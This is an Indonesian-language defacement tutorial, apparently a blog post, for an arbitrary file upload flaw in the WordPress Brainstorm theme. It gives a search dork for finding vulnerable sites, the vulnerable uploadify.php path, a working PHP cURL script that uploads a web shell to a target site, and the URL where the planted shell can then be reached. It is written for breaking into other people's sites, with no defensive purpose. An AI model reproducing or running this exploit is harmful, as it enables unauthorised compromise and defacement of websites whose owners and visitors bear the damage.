Exploit WP Themes Brainstorm Arbitrary File Upload Vulnerability

 Sekarang gua akan Share Tutorial Deface dengan eXploit WP Themes Brainstorm Arbitrary File Upload Vulnerability

Dork:
inurl:/wp-content/themes/brainstorm
(Selebihnya kebangin lg menggunakan imajinasi vokepers kalian, biar dpt yg vuln n verawan)

1. Dorking di search Engine

2. pilih salah satu web target yg pengen ente tusb0l pak wkwk, lalu masukan exploitnya.

exploit: /[path]//wp-content/themes/brainstorm/functions/jwpanel/scripts/uploadify/uploadify.php

3. Vulnerability ~ Blank

Kurang lebih sih gituh awkkaw~

4. Buat File Baru Berekstensi .php Contoh brain.php Dan Simpan Script Berikut Di Directory C:/XAMPP/php Masukan Script Berikut Edit-Edit Dikit dan taruh juga shell sobat di directory yang sama dgn brain.php tadi

<?php

$uploadfile="namashell.php";
$ch = curl_init("www.target.com/[path]/wp-content/themes/brainstorm/functions/jwpanel/scripts/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
              array('Filedata'=>"@$uploadfile",
              'folder'=>'/wordpress/wp-content/themes/brainstorm/functions/jwpanel/scripts/uploadify/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);

  print "$postResult";

?> 


5. Buka Xampp kalian yang sudah terinstall, nyalakan apace sama mysql nya
6. Buka CMD dan ketikan perintah
cd C:/xampp/php
php namaexploitlo.php

7. jika sukses , akan muncul nama shell sobat di CMD,dan akan keluar lengkap link akses shell ente

disitu dah ada kok letak shell lo dimane :p

8. Shell Akses: target.com/wordpress/wp-content/uploads/Year/month/namashell.php



 


Sumber : TKJ Cyber Art